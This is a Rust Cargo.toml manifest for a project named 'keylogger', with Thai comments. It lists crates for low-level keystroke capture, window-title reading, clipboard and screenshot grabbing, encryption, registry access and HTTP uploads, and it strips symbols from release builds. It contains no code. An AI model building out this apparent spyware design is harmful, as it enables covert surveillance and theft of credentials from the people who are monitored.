[package]
name = "keylogger"
version = "1.0.0"
edition = "2021"

[dependencies]
rdev = "0.5"                  # ดักการกดคีย์ระดับ low-level
windows = { version = "0.58", features = ["Win32_Foundation", "Win32_UI_WindowsAndMessaging", "Win32_System_DataExchange", "Win32_System_Memory"] } # ดูชื่อหน้าต่าง
tokio = { version = "1", features = ["full"] }
aes-gcm = "0.10"
rand = "0.8"
serde = { version = "1", features = ["derive"] }
serde_json = "1"
toml = "0.8"
hex = "0.4"
winreg = "0.52"
clipboard = "0.5"
screenshots = "0.8"
image = "0.24"
reqwest = { version = "0.11", features = ["json", "rustls-tls"] }

[profile.release]
strip = true
lto = true
codegen-units = 1
panic = "abort"